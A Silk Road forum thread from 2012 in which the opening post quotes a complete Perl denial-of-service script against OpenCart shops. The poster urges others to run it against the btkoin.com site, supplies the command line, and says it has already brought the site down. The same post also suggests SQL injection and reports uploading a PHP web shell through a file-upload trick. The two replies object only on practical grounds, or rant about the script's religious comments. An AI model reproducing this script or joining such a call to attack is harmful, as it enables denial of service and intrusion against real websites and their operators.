Silk Road forums

Discussion => Security => Topic started by: Hiding on September 30, 2012, 05:08 pm

Title: btkoin Scam - help fight back - hack the planet
Post by: Hiding on September 30, 2012, 05:08 pm
I'm sure you're all getting spammed and bothered by multiple users, representing btkoin.com and their scam... I did a search and found something useful:
Quote
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : OpenCart 1.4.x 1.5 DDoS Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote DDos Attack (D.O.S Server)
# Tested on : Windows XP SP3 Français
# Target : OpenCart 1.4.x 1.5
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 00");
system("cls");
sleep(1);
# **  Allah Akbar **
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /shop/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >

I am good with perl but this is not my code, it does work though, as it has DoS'd their site a few times. It does keep coming back, but this is where you guys come in ;)
Anyone with perl installed, run this for a bit and help keep it down.

from command prompt: type "(filename).pl btkoin.com /"

It will drop it within a few minutes.

Someone better with sqli might want to look around in /index.php?route=common/_DIR&product_id='sql.

I found a published LFIe using upload.shell.jpg, and uploaded a shell.php[null].jpg but I'm not sure how to find it, it said the upload was successful but the supposed to be base64'd random file name just said ":null"

Title: Re: btkoin Scam - help fight back - hack the planet
Post by: taseMeBro on October 01, 2012, 02:26 am
Um...

I don't think anyone here is going to run a script that was taken from the SR Forums to flood a specific address on clearnet, and it's a serious douche move to send packet floods over TOR, it has limited resources as it is.
Title: Re: btkoin Scam - help fight back - hack the planet
Post by: BanDit on October 05, 2012, 11:22 am
Confirmed they are a scam?

Does it make me a bad person or whatever that I wouldn't use script written by a religious nutter that actually comments in stuff like

# ********* In The name of Allah ************

Give a fuck that its Allah too would be as bad if it was like...

# ********* In The name of Buddha ************

or

# ********* In The name of L. Ron Hubbard ************

I mean really in the world of hacking there should be no religion, race or gender.

BanDit